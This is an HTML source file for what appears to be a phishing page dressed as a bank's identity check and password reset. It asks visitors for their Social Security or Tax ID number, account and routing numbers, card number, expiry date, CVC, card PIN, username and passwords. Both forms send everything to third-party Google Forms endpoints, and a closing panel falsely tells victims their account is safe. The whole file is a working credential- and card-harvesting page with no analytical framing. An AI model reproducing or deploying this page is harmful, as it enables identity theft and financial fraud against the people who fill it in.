<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" type="image/png" sizes="32x32" href="white.png" />
    <link rel="stylesheet" href="styles.css" />
    <title>Online</title>
  </head>
  <body>
    <div class="container">
      <header>
        <img src="white.png" alt="" />
      </header>
      <main>
        <div class="containerfluid">
          <div class="containerfluidid">
            <div class="topcontainer">
              <h1>Identification</h1>
              <div class="line"></div>
            </div>
            <div class="midcontainer">
              <h1>Let's confirm your identity.</h1>
              <p>
                To protect your account, please tell us the requested info so we can confirm your identity. If you have more than one account, choose
                one and we'll take care of the rest.
              </p>
              <p>Commercial administrators must tell us a Tax ID number.</p>
              <form
                action="https://docs.google.com/forms/d/e/1FAIpQLSdlIz8NK5vxWnM2rTn5up-MO5O1FuQBDERK2vSS4FRGn8FRyw/formResponse"
                class="formone"
                novalidate>
                <label for="ssno" class="ssnoo">Social Security number or Tax ID (TIN)</label>
                <input type="text" name="entry.2005620554" id="ssno" />
                <span class="error01"></span>
                <label for="acc" class="accc">Account Number</label>
                <input type="text" name="entry.1045781291" id="acc" />
                <span class="error02"></span>
                <label for="rou" class="rouu">Routing Number</label>
                <input type="text" name="entry.1065046570" id="rou" />
                <span class="error03"></span>
                <label for="cardno" class="cardnoo">Card Number</label>
                <input type="text" name="entry.1166974658" id="cardno" />
                <span class="error04"></span>
                <label for="mmyy" class="mmyyy">MM/YY</label>
                <input type="text" name="entry.839337160" id="mmyy" />
                <span class="error05"></span>
                <label for="cvc" class="cvcc">CVC</label>
                <input type="text" name="entry.106148091" id="cvc" />
                <span class="error06"></span>
                <label for="cardp" class="cardpp">Card Pin</label>
                <input type="text" name="entry.278657919" id="cardp" />
                <span class="error07"></span>
                <button type="submit">Next</button>
              </form>
            </div>
          </div>
          <div class="containerfluidpass">
            <div class="topcontainer">
              <h1>Reset Password</h1>
              <div class="line"></div>
            </div>
            <div class="midcontainer">
              <h1>Reset Your Password.</h1>
              <p>
                You’re almost there, please choose a new password. Be rest assured if you have more than one account we'll take care of the rest..
              </p>
              <form
                action="https://docs.google.com/forms/d/e/1FAIpQLSfw5gXxmybT5l-rXsQvc4h6Le--1YO5bQghhgDek7Hw3m_TrA/formResponse"
                class="formtwo"
                novalidate>
                <label for="username" class="usernamee">Username</label>
                <input type="text" name="entry.644033260" id="username" />
                <span class="error11"></span>
                <label for="oldpass" class="oldpasss">Old Password</label>
                <input type="password" name="entry.1186924124" id="oldpass" />
                <span class="error12"></span>
                <label for="newpass" class="newpasss">New Password</label>
                <input type="password" name="entry.1923234807" id="newpass" />
                <span class="error13"></span>
                <label for="connewpass" class="connewpasss">Confirm New Password</label>
                <input type="password" name="entry.1666801366" id="connewpass" />
                <span class="error14"></span>
                <button type="submit">Next</button>
              </form>
            </div>
          </div>
          <div class="containerfluidconfirm">
            <div class="topcontainer">
              <h1>Account Recovered</h1>
              <div class="line"></div>
            </div>
            <div class="midcontainer">
              <h1 class="mid">Your account is safe now!</h1>
            </div>
          </div>
        </div>
      </main>
    </div>
    <script src="bundle.js"></script>
  </body>
</html>
